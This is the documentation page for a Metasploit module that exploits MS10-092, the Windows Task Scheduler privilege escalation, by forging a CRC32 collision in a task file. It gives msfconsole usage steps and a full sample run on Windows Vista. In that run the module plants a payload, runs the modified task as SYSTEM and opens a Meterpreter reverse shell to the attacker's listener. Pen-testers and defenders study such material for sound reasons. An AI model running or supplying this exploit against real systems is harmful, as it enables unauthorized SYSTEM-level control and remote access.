## Vulnerable Application

This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges.

## Scenarios

## Verification Steps

1. Start msfconsole
2. Do: `use modules/exploits/windows/local/ms10_092_schelevator`
3. Do: `set SESSION [#]`
4. Do: `run`

### A run on Windows Vista (Build 6000) and Kali Linux 2019.3

  ```
  msf > use modules/exploits/windows/local/ms10_092_schelevator
  msf exploit(windows/local/ms10_092_schelevator) > set SESSION 1
    SESSION => 1
  msf5 exploit(windows/local/ms10_092_schelevator) > run  
    [*] Started reverse TCP handler on 192.168.1.3:4444
    [*] Preparing payload at C:\Users\test\AppData\Local\Temp\CItOOtB.exe
    [*] Creating task: TzAZ6H4K
    [*] SUCCESS: The scheduled task "TzAZ6H4K" has successfully been created.
    [*] SCHELEVATOR
    [*] Reading the task file contents from C:\Windows\system32\tasks\TzAZ6H4K...
    [*] Original CRC32: 0x69b1db25
    [*] Final CRC32: 0x69b1db25
    [*] Writing our modified content back...
    [*] Validating task: TzAZ6H4K
    [*]
    [*] Folder: \
    [*] TaskName                                   Next Run Time        Status
    [*] ========================================== ==================== ===============
    [*] TzAZ6H4K                                   12/1/2019 10:41:00 A Ready
    [*] SCHELEVATOR
    [*] Disabling the task...
    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
    [*] SCHELEVATOR
    [*] Enabling the task...
    [*] SUCCESS: The parameters of scheduled task "TzAZ6H4K" have been changed.
    [*] SCHELEVATOR
    [*] Executing the task...
    [*] Sending stage (180291 bytes) to 192.168.1.2
    [*] SUCCESS: Attempted to run the scheduled task "TzAZ6H4K".
    [*] SCHELEVATOR
    [*] Deleting the task...
    [*] Meterpreter session 2 opened (192.168.1.3:4444 -> 192.168.1.2:49249) at 2019-11-27 10:42:02 -0700
    [*] SUCCESS: The scheduled task "TzAZ6H4K" was successfully deleted.
    [*] SCHELEVATOR
  ```